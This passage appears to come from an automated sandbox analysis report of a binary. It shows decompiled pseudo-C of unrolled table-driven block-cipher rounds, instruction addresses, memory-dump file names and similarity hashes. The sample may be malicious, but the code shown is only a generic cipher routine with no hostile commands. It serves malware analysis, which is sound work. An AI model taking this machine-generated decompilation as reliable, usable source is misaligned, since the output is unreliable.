                                    						_t603 =  *(0xf14ca40 + (_t789 & 0x000000ff) * 4) ^  *(0xf14c240 + (_t681 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t824 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t682 & 0x000000ff) * 4) ^  *_t1143;
                                    						_t684 =  *(0xf14c240 + (_t628 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t681 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t789 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t844 & 0x000000ff) * 4) ^ _t1143[1];
                                    						_t1144 =  &(_t1143[4]);
                                    						 *_t1181 = _t1144;
                                    						asm("rol eax, 0x10");
                                    						_t686 = _t684 & 0xffff0000 | _t603 >> 0x00000010;
                                    						_t798 = _t797 >> 0x10;
                                    						_t687 = _t686 >> 0x10;
                                    						_t846 = _t845 >> 0x10;
                                    						_t699 = _t1144[2] ^  *(0xf14c240 + (_t797 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t684 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t603 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t846 & 0x000000ff) * 4);
                                    						_t824 = _t1144[3] ^  *(0xf14c240 + (_t845 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t797 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t603 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t687 & 0x000000ff) * 4);
                                    						_t998 =  *_t1181;
                                    						_t514 =  *(0xf14ca40 + (_t798 & 0x000000ff) * 4) ^  *(0xf14c240 + (_t686 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t845 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t687 & 0x000000ff) * 4) ^  *_t998;
                                    						_t628 =  *(0xf14c240 + (_t684 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t686 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t798 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t846 & 0x000000ff) * 4) ^ _t998[1];
                                    						goto L6;
                                    					} else {
                                    						if(_t851 == 0xe0) {
                                    							_t1156 =  &(_t998[4]);
                                    							 *_t1181 = _t1156;
                                    							asm("rol eax, 0x10");
                                    							_t690 = _t628 & 0xffff0000 | _t514 >> 0x00000010;
                                    							_t806 = _t699 >> 0x10;
                                    							_t691 = _t690 >> 0x10;
                                    							_t847 = _t824 >> 0x10;
                                    							_t814 = _t1156[2] ^  *(0xf14c240 + (_t699 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t628 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t514 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t847 & 0x000000ff) * 4);
                                    							_t848 = _t1156[3] ^  *(0xf14c240 + (_t824 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t699 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t514 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t691 & 0x000000ff) * 4);
                                    							_t1168 =  *_t1181;
                                    							_t618 =  *(0xf14ca40 + (_t806 & 0x000000ff) * 4) ^  *(0xf14c240 + (_t690 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t824 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t691 & 0x000000ff) * 4) ^  *_t1168;
                                    							_t693 =  *(0xf14c240 + (_t628 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t690 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t806 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t847 & 0x000000ff) * 4) ^ _t1168[1];
                                    							_t1169 =  &(_t1168[4]);
                                    							 *_t1181 = _t1169;
                                    							asm("rol eax, 0x10");
                                    							_t695 = _t693 & 0xffff0000 | _t618 >> 0x00000010;
                                    							_t815 = _t814 >> 0x10;
                                    							_t696 = _t695 >> 0x10;
                                    							_t849 = _t848 >> 0x10;
                                    							_t699 = _t1169[2] ^  *(0xf14c240 + (_t814 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t693 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t618 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t849 & 0x000000ff) * 4);
                                    							_t824 = _t1169[3] ^  *(0xf14c240 + (_t848 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t814 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t618 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t696 & 0x000000ff) * 4);
                                    							_t998 =  *_t1181;
                                    							_t514 =  *(0xf14ca40 + (_t815 & 0x000000ff) * 4) ^  *(0xf14c240 + (_t695 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t848 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t696 & 0x000000ff) * 4) ^  *_t998;
                                    							_t628 =  *(0xf14c240 + (_t693 & 0x000000ff) * 4) ^  *(0xf14c640 + (_t695 & 0x000000ff) * 4) ^  *(0xf14ce40 + (_t815 & 0x000000ff) * 4) ^  *(0xf14ca40 + (_t849 & 0x000000ff) * 4) ^ _t998[1];
                                    							goto L5;
                                    						} else {
                                    							_t595 = 0xffffffff;
                                    						}
                                    					}
                                    				}
                                    				return _t595;
                                    			}












































































































































                                    0x0f141c23
                                    0x0f141c27
                                    0x0f141c2b
                                    0x0f141c2f
                                    0x0f141c33
                                    0x0f141c45
                                    0x0f141c49
                                    0x0f141c50
                                    0x0f141c53
                                    0x0f141c56
                                    0x0f141c59
                                    0x0f141c62
                                    0x0f141fce
                                    0x0f141fce
                                    0x0f141fd1
                                    0x0f141fda
                                    0x0f14202c
                                    0x0f14202e
                                    0x0f142063
                                    0x0f142066
                                    0x0f142093
                                    0x0f142095
                                    0x0f142097
                                    0x0f14209a
                                    0x0f14209d
                                    0x0f1420a0
                                    0x0f1420a3
                                    0x0f1420ac
                                    0x0f1420fe
                                    0x0f142100
                                    0x0f142135
                                    0x0f142138
                                    0x0f142165
                                    0x0f142167
                                    0x0f142169
                                    0x0f14216c
                                    0x0f14216f
                                    0x0f142172
                                    0x0f142175
                                    0x0f14217e
                                    0x0f1421d0
                                    0x0f1421d2
                                    0x0f142207
                                    0x0f14220a
                                    0x0f142237
                                    0x0f142239
                                    0x0f14223b
                                    0x0f14223e
                                    0x0f142241
                                    0x0f142244
                                    0x0f142247
                                    0x0f142250
                                    0x0f1422a2
                                    0x0f1422a4
                                    0x0f1422d9
                                    0x0f1422dc
                                    0x0f142309
                                    0x0f14230b
                                    0x0f14230d
                                    0x0f142310
                                    0x0f142313
                                    0x0f142316
                                    0x0f142319
                                    0x0f142322
                                    0x0f142374
                                    0x0f142376
                                    0x0f1423ab
                                    0x0f1423ae
                                    0x0f1423db
                                    0x0f1423dd
                                    0x0f1423df
                                    0x0f1423e2
                                    0x0f1423e5
                                    0x0f1423e8
                                    0x0f1423eb
                                    0x0f1423f4
                                    0x0f142446
                                    0x0f142448
                                    0x0f14247d
                                    0x0f142480
                                    0x0f1424ad
                                    0x0f1424af
                                    0x0f1424b1
                                    0x0f1424b4
                                    0x0f1424b7
                                    0x0f1424ba
                                    0x0f1424bd
                                    0x0f1424c6
                                    0x0f142518
                                    0x0f14251a
                                    0x0f14254f
                                    0x0f142552
                                    0x0f14257f
                                    0x0f142581
                                    0x0f142583
                                    0x0f142586
                                    0x0f142589
                                    0x0f14258c
                                    0x0f14258f
                                    0x0f142598
                                    0x0f1425ea
                                    0x0f1425ec
                                    0x0f142621
                                    0x0f142624
                                    0x0f142651
                                    0x0f142653
                                    0x0f142655
                                    0x0f142658
                                    0x0f14265b
                                    0x0f14265e
                                    0x0f142661
                                    0x0f14266a
                                    0x0f1426bc
                                    0x0f1426be
                                    0x0f1426f3
                                    0x0f1426f6
                                    0x0f142723
                                    0x0f142725
                                    0x0f142727
                                    0x0f14272a
                                    0x0f14272d
                                    0x0f142730
                                    0x0f142733
                                    0x0f14273c
                                    0x0f14278e
                                    0x0f142790
                                    0x0f1427c5
                                    0x0f1427c8
                                    0x0f1427f5
                                    0x0f1427fe
                                    0x0f142802
                                    0x0f142805
                                    0x0f142808
                                    0x0f14280b
                                    0x0f14280e
                                    0x0f141c68
                                    0x0f141c6e
                                    0x0f141e2a
                                    0x0f141e2a
                                    0x0f141e2d
                                    0x0f141e36
                                    0x0f141e88
                                    0x0f141e8a
                                    0x0f141ebf
                                    0x0f141ec2
                                    0x0f141eef
                                    0x0f141ef1
                                    0x0f141ef3
                                    0x0f141ef6
                                    0x0f141ef9
                                    0x0f141efc
                                    0x0f141eff
                                    0x0f141f08
                                    0x0f141f5a
                                    0x0f141f5c
                                    0x0f141f91
                                    0x0f141f94
                                    0x0f141fc1
                                    0x0f141fc3
                                    0x0f141fc5
                                    0x0f141fc8
                                    0x0f141fcb
                                    0x00000000
                                    0x0f141c74
                                    0x0f141c7a
                                    0x0f141c86
                                    0x0f141c89
                                    0x0f141c92
                                    0x0f141ce4
                                    0x0f141ce6
                                    0x0f141d1b
                                    0x0f141d1e
                                    0x0f141d4b
                                    0x0f141d4d
                                    0x0f141d4f
                                    0x0f141d52
                                    0x0f141d55
                                    0x0f141d58
                                    0x0f141d5b
                                    0x0f141d64
                                    0x0f141db6
                                    0x0f141db8
                                    0x0f141ded
                                    0x0f141df0
                                    0x0f141e1d
                                    0x0f141e1f
                                    0x0f141e21
                                    0x0f141e24
                                    0x0f141e27
                                    0x00000000
                                    0x0f141c7c
                                    0x0f141c7c
                                    0x0f141c7c
                                    0x0f141c7a
                                    0x0f141c6e
                                    0x0f142823

                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a3b471517fa83d8249a252c0ff1c12a526527e9d1139a90d647b739a94fb1a4e
                                    • Instruction ID: d63940347cdcc7afaf688d0229c5bebb5e686c9580f334af7229166a81b46635
                                    • Opcode Fuzzy Hash: a3b471517fa83d8249a252c0ff1c12a526527e9d1139a90d647b739a94fb1a4e
                                    • Instruction Fuzzy Hash: 13722B35C112688FDB84EF6EE454036B3A1E784333B47453EA9816B292D6347578EBEC
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 90%
                                    			E0F141020(signed int* __ebx, signed int* __edi, signed int* __esi) {
                                    				signed int _t513;
                                    				signed char _t515;
                                    				signed char _t516;
                                    				signed char _t518;
                                    				signed char _t520;
                                    				signed char _t521;
                                    				signed char _t523;
                                    				signed char _t525;
                                    				signed char _t526;
                                    				signed char _t528;
                                    				signed char _t530;
                                    				signed char _t531;
                                    				signed char _t533;
                                    				signed char _t535;
                                    				signed char _t536;
                                    				signed char _t538;
                                    				signed char _t540;
                                    				signed char _t541;
                                    				signed char _t543;
                                    				signed char _t545;
                                    				signed char _t546;
                                    				signed char _t548;
                                    				signed char _t550;
                                    				signed char _t551;
                                    				signed char _t553;
                                    				signed char _t555;
                                    				signed char _t556;
                                    				signed char _t558;
                                    				signed char _t560;
                                    				signed char _t561;
                                    				void* _t564;
                                    				signed char _t566;
                                    				signed char _t567;
                                    				signed char _t569;
                                    				signed char _t571;
                                    				signed char _t572;
                                    				signed char _t575;
                                    				signed char _t576;
                                    				signed char _t578;
                                    				signed char _t580;
                                    				signed char _t581;
                                    				signed int _t585;
                                    				signed char _t594;
                                    				signed char _t603;
                                    				signed char _t612;
                                    				signed char _t621;
                                    				signed char _t630;
                                    				signed char _t639;
                                    				signed char _t648;
                                    				signed char _t657;
                                    				signed char _t666;
                                    				signed char _t685;
                                    				signed char _t702;
                                    				signed int _t712;
                                    				signed char _t713;
                                    				signed char _t714;
                                    				signed char _t715;
                                    				signed char _t716;
                                    				signed char _t717;
                                    				signed char _t718;
                                    				signed char _t719;
                                    				signed char _t720;
                                    				signed char _t721;
                                    				signed char _t722;
                                    				signed char _t723;
                                    				signed char _t724;
                                    				signed char _t725;
                                    				signed char _t726;
                                    				signed char _t727;
                                    				signed char _t728;
                                    				signed char _t729;
                                    				signed char _t730;
                                    				signed char _t731;
                                    				signed char _t732;
                                    				signed char _t733;
                                    				signed char _t734;
                                    				signed char _t735;
                                    				signed char _t736;
                                    				signed char _t737;
                                    				signed int _t739;
                                    				signed char _t740;
                                    				signed char _t747;
                                    				signed char _t748;
                                    				signed char _t755;
                                    				signed char _t756;
                                    				signed char _t763;
                                    				signed char _t764;
                                    				signed char _t771;
                                    				signed char _t772;
                                    				signed char _t779;
                                    				signed char _t780;
                                    				signed char _t787;
                                    				signed char _t788;
                                    				signed char _t795;
                                    				signed char _t796;
                                    				signed char _t803;
                                    				signed char _t804;
                                    				signed char _t811;
                                    				signed char _t812;
                                    				signed int* _t819;
                                    				signed char _t820;
                                    				signed char _t827;
                                    				signed char _t828;
                                    				signed char _t835;
                                    				signed char _t842;
                                    				signed char _t843;
                                    				signed int _t851;
                                    				signed int* _t924;
                                    				signed int* _t996;
                                    				signed int* _t997;
                                    				signed int* _t998;
                                    				signed int* _t1010;
                                    				signed int* _t1011;
                                    				signed int* _t1023;
                                    				signed int* _t1024;
                                    				signed int* _t1036;
                                    				signed int* _t1037;
                                    				signed int* _t1049;
                                    				signed int* _t1050;
                                    				signed int* _t1062;
                                    				signed int* _t1063;
                                    				signed int* _t1075;
                                    				signed int* _t1076;
                                    				signed int* _t1088;
                                    				signed int* _t1089;
                                    				signed int* _t1101;
                                    				signed int* _t1102;
                                    				signed int* _t1114;
                                    				signed int* _t1115;
                                    				signed int* _t1127;
                                    				signed int* _t1129;
                                    				signed int* _t1141;
                                    				signed int* _t1142;
                                    				signed int* _t1154;
                                    				signed int* _t1166;
                                    				signed int* _t1167;
                                    				signed int** _t1179;
                                    
                                    				_t1179[4] = _t996;
                                    				_t1179[3] = __ebx;
                                    				_t1179[2] = __esi;
                                    				_t1179[1] = __edi;
                                    				_t924 = _t1179[6];
                                    				_t997 = _t1179[8];
                                    				_t851 = _t997[0x3c] & 0x000000ff;
                                    				_t513 =  *_t924 ^  *_t997;
                                    				_t585 = _t924[1] ^ _t997[1];
                                    				_t712 = _t924[2] ^ _t997[2];
                                    				_t739 = _t924[3] ^ _t997[3];
                                    				if(_t851 == 0xa0) {
                                    					L6:
                                    					_t998 =  &(_t997[4]);
                                    					 *_t1179 = _t998;
                                    					asm("rol ebx, 0x10");
                                    					_t515 = _t513 & 0xffff0000 | _t585 >> 0x00000010;
                                    					_t740 = _t739 >> 0x10;
                                    					_t516 = _t515 >> 0x10;
                                    					_t713 = _t712 >> 0x10;
                                    					_t714 = _t998[2] ^  *(0xf14a240 + (_t712 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t739 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t585 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t516 & 0x000000ff) * 4);
                                    					_t747 = _t998[3] ^  *(0xf14a240 + (_t739 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t513 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t585 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t713 & 0x000000ff) * 4);
                                    					_t1010 =  *_t1179;
                                    					_t518 =  *(0xf14a240 + (_t513 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t515 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t740 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t713 & 0x000000ff) * 4) ^  *_t1010;
                                    					_t594 =  *(0xf14aa40 + (_t740 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t712 & 0x000000ff) * 4) ^  *(0xf14a240 + (_t515 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t516 & 0x000000ff) * 4) ^ _t1010[1];
                                    					_t1011 =  &(_t1010[4]);
                                    					 *_t1179 = _t1011;
                                    					asm("rol ebx, 0x10");
                                    					_t520 = _t518 & 0xffff0000 | _t594 >> 0x00000010;
                                    					_t748 = _t747 >> 0x10;
                                    					_t521 = _t520 >> 0x10;
                                    					_t715 = _t714 >> 0x10;
                                    					_t716 = _t1011[2] ^  *(0xf14a240 + (_t714 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t747 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t594 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t521 & 0x000000ff) * 4);
                                    					_t755 = _t1011[3] ^  *(0xf14a240 + (_t747 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t518 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t594 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t715 & 0x000000ff) * 4);
                                    					_t1023 =  *_t1179;
                                    					_t523 =  *(0xf14a240 + (_t518 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t520 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t748 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t715 & 0x000000ff) * 4) ^  *_t1023;
                                    					_t603 =  *(0xf14aa40 + (_t748 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t714 & 0x000000ff) * 4) ^  *(0xf14a240 + (_t520 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t521 & 0x000000ff) * 4) ^ _t1023[1];
                                    					_t1024 =  &(_t1023[4]);
                                    					 *_t1179 = _t1024;
                                    					asm("rol ebx, 0x10");
                                    					_t525 = _t523 & 0xffff0000 | _t603 >> 0x00000010;
                                    					_t756 = _t755 >> 0x10;
                                    					_t526 = _t525 >> 0x10;
                                    					_t717 = _t716 >> 0x10;
                                    					_t718 = _t1024[2] ^  *(0xf14a240 + (_t716 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t755 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t603 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t526 & 0x000000ff) * 4);
                                    					_t763 = _t1024[3] ^  *(0xf14a240 + (_t755 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t523 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t603 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t717 & 0x000000ff) * 4);
                                    					_t1036 =  *_t1179;
                                    					_t528 =  *(0xf14a240 + (_t523 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t525 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t756 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t717 & 0x000000ff) * 4) ^  *_t1036;
                                    					_t612 =  *(0xf14aa40 + (_t756 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t716 & 0x000000ff) * 4) ^  *(0xf14a240 + (_t525 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t526 & 0x000000ff) * 4) ^ _t1036[1];
                                    					_t1037 =  &(_t1036[4]);
                                    					 *_t1179 = _t1037;
                                    					asm("rol ebx, 0x10");
                                    					_t530 = _t528 & 0xffff0000 | _t612 >> 0x00000010;
                                    					_t764 = _t763 >> 0x10;
                                    					_t531 = _t530 >> 0x10;
                                    					_t719 = _t718 >> 0x10;
                                    					_t720 = _t1037[2] ^  *(0xf14a240 + (_t718 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t763 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t612 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t531 & 0x000000ff) * 4);
                                    					_t771 = _t1037[3] ^  *(0xf14a240 + (_t763 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t528 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t612 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t719 & 0x000000ff) * 4);
                                    					_t1049 =  *_t1179;
                                    					_t533 =  *(0xf14a240 + (_t528 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t530 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t764 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t719 & 0x000000ff) * 4) ^  *_t1049;
                                    					_t621 =  *(0xf14aa40 + (_t764 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t718 & 0x000000ff) * 4) ^  *(0xf14a240 + (_t530 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t531 & 0x000000ff) * 4) ^ _t1049[1];
                                    					_t1050 =  &(_t1049[4]);
                                    					 *_t1179 = _t1050;
                                    					asm("rol ebx, 0x10");
                                    					_t535 = _t533 & 0xffff0000 | _t621 >> 0x00000010;
                                    					_t772 = _t771 >> 0x10;
                                    					_t536 = _t535 >> 0x10;
                                    					_t721 = _t720 >> 0x10;
                                    					_t722 = _t1050[2] ^  *(0xf14a240 + (_t720 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t771 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t621 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t536 & 0x000000ff) * 4);
                                    					_t779 = _t1050[3] ^  *(0xf14a240 + (_t771 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t533 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t621 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t721 & 0x000000ff) * 4);
                                    					_t1062 =  *_t1179;
                                    					_t538 =  *(0xf14a240 + (_t533 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t535 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t772 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t721 & 0x000000ff) * 4) ^  *_t1062;
                                    					_t630 =  *(0xf14aa40 + (_t772 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t720 & 0x000000ff) * 4) ^  *(0xf14a240 + (_t535 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t536 & 0x000000ff) * 4) ^ _t1062[1];
                                    					_t1063 =  &(_t1062[4]);
                                    					 *_t1179 = _t1063;
                                    					asm("rol ebx, 0x10");
                                    					_t540 = _t538 & 0xffff0000 | _t630 >> 0x00000010;
                                    					_t780 = _t779 >> 0x10;
                                    					_t541 = _t540 >> 0x10;
                                    					_t723 = _t722 >> 0x10;
                                    					_t724 = _t1063[2] ^  *(0xf14a240 + (_t722 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t779 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t630 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t541 & 0x000000ff) * 4);
                                    					_t787 = _t1063[3] ^  *(0xf14a240 + (_t779 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t538 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t630 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t723 & 0x000000ff) * 4);
                                    					_t1075 =  *_t1179;
                                    					_t543 =  *(0xf14a240 + (_t538 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t540 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t780 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t723 & 0x000000ff) * 4) ^  *_t1075;
                                    					_t639 =  *(0xf14aa40 + (_t780 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t722 & 0x000000ff) * 4) ^  *(0xf14a240 + (_t540 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t541 & 0x000000ff) * 4) ^ _t1075[1];
                                    					_t1076 =  &(_t1075[4]);
                                    					 *_t1179 = _t1076;
                                    					asm("rol ebx, 0x10");
                                    					_t545 = _t543 & 0xffff0000 | _t639 >> 0x00000010;
                                    					_t788 = _t787 >> 0x10;
                                    					_t546 = _t545 >> 0x10;
                                    					_t725 = _t724 >> 0x10;
                                    					_t726 = _t1076[2] ^  *(0xf14a240 + (_t724 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t787 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t639 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t546 & 0x000000ff) * 4);
                                    					_t795 = _t1076[3] ^  *(0xf14a240 + (_t787 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t543 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t639 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t725 & 0x000000ff) * 4);
                                    					_t1088 =  *_t1179;
                                    					_t548 =  *(0xf14a240 + (_t543 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t545 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t788 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t725 & 0x000000ff) * 4) ^  *_t1088;
                                    					_t648 =  *(0xf14aa40 + (_t788 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t724 & 0x000000ff) * 4) ^  *(0xf14a240 + (_t545 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t546 & 0x000000ff) * 4) ^ _t1088[1];
                                    					_t1089 =  &(_t1088[4]);
                                    					 *_t1179 = _t1089;
                                    					asm("rol ebx, 0x10");
                                    					_t550 = _t548 & 0xffff0000 | _t648 >> 0x00000010;
                                    					_t796 = _t795 >> 0x10;
                                    					_t551 = _t550 >> 0x10;
                                    					_t727 = _t726 >> 0x10;
                                    					_t728 = _t1089[2] ^  *(0xf14a240 + (_t726 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t795 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t648 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t551 & 0x000000ff) * 4);
                                    					_t803 = _t1089[3] ^  *(0xf14a240 + (_t795 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t548 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t648 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t727 & 0x000000ff) * 4);
                                    					_t1101 =  *_t1179;
                                    					_t553 =  *(0xf14a240 + (_t548 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t550 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t796 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t727 & 0x000000ff) * 4) ^  *_t1101;
                                    					_t657 =  *(0xf14aa40 + (_t796 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t726 & 0x000000ff) * 4) ^  *(0xf14a240 + (_t550 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t551 & 0x000000ff) * 4) ^ _t1101[1];
                                    					_t1102 =  &(_t1101[4]);
                                    					 *_t1179 = _t1102;
                                    					asm("rol ebx, 0x10");
                                    					_t555 = _t553 & 0xffff0000 | _t657 >> 0x00000010;
                                    					_t804 = _t803 >> 0x10;
                                    					_t556 = _t555 >> 0x10;
                                    					_t729 = _t728 >> 0x10;
                                    					_t730 = _t1102[2] ^  *(0xf14a240 + (_t728 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t803 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t657 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t556 & 0x000000ff) * 4);
                                    					_t811 = _t1102[3] ^  *(0xf14a240 + (_t803 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t553 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t657 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t729 & 0x000000ff) * 4);
                                    					_t1114 =  *_t1179;
                                    					_t558 =  *(0xf14a240 + (_t553 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t555 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t804 & 0x000000ff) * 4) ^  *(0xf14aa40 + (_t729 & 0x000000ff) * 4) ^  *_t1114;
                                    					_t666 =  *(0xf14aa40 + (_t804 & 0x000000ff) * 4) ^  *(0xf14a640 + (_t728 & 0x000000ff) * 4) ^  *(0xf14a240 + (_t555 & 0x000000ff) * 4) ^  *(0xf14ae40 + (_t556 & 0x000000ff) * 4) ^ _t1114[1];
                                    					_t1115 =  &(_t1114[4]);
                                    					 *_t1179 = _t1115;
                                    					asm("rol ebx, 0x10");
                                    					_t560 = _t558 & 0xffff0000 | _t666 >> 0x00000010;
                                    					_t812 = _t811 >> 0x10;
                                    					_t561 = _t560 >> 0x10;
                                    					_t731 = _t730 >> 0x10;
                                    					_t1127 =  *_t1179;
                                    					_t819 = _t1179[7];
                                    					 *_t819 =  *(0xf14b240 + (_t558 & 0x000000ff) * 4) ^  *(0xf14b640 + (_t560 & 0x000000ff) * 4) ^  *(0xf14be40 + (_t812 & 0x000000ff) * 4) ^  *(0xf14ba40 + (_t731 & 0x000000ff) * 4) ^  *_t1127;
                                    					_t819[1] =  *(0xf14ba40 + (_t812 & 0x000000ff) * 4) ^  *(0xf14b640 + (_t730 & 0x000000ff) * 4) ^  *(0xf14b240 + (_t560 & 0x000000ff) * 4) ^  *(0xf14be40 + (_t561 & 0x000000ff) * 4) ^ _t1127[1];
                                    					_t819[2] = _t1115[2] ^  *(0xf14b240 + (_t730 & 0x000000ff) * 4) ^  *(0xf14b640 + (_t811 & 0x000000ff) * 4) ^  *(0xf14be40 + (_t666 & 0x000000ff) * 4) ^  *(0xf14ba40 + (_t561 & 0x000000ff) * 4);
                                    					_t819[3] = _t1115[3] ^  *(0xf14b240 + (_t811 & 0x000000ff) * 4) ^  *(0xf14b640 + (_t558 & 0x000000ff) * 4) ^  *(0xf14ba40 + (_t666 & 0x000000ff) * 4) ^  *(0xf14be40 + (_t731 & 0x000000ff) * 4);
